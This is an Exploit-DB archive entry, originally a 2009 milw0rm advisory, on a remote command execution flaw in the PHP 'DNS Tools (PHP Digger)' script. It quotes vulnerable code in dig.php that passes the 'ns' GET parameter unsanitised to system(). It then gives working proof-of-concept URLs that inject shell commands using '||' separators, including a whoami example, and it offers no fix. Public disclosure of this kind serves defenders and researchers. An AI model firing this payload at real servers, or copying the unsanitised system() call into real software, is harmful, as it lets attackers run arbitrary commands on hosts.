exploit-db-mirror/exploits/php/webapps/8454.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

31 lines
No EOL
932 B
Text

############################################################################################
[+] DNS Tools (PHP Digger) Remote Command Execution
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
############################################################################################
[+] Remote Command Execution
- Vulnerable code in dig.php
------------------------------------------
$ns = $_GET['ns'];
system ("dig @$ns $host $query_type");
------------------------------------------
We can execute commands via "ns" variable.Just use || before and after
the command.
PoC :
http://127.0.0.1/dig.php?ns=||COMMAND HERE||&host=mortal-team.net&query_type=NS&status=digging
Example :
http://127.0.0.1/dig.php?ns=||whoami||&host=mortal-team.net&query_type=NS&status=digging
############################################################################################
# milw0rm.com [2009-04-16]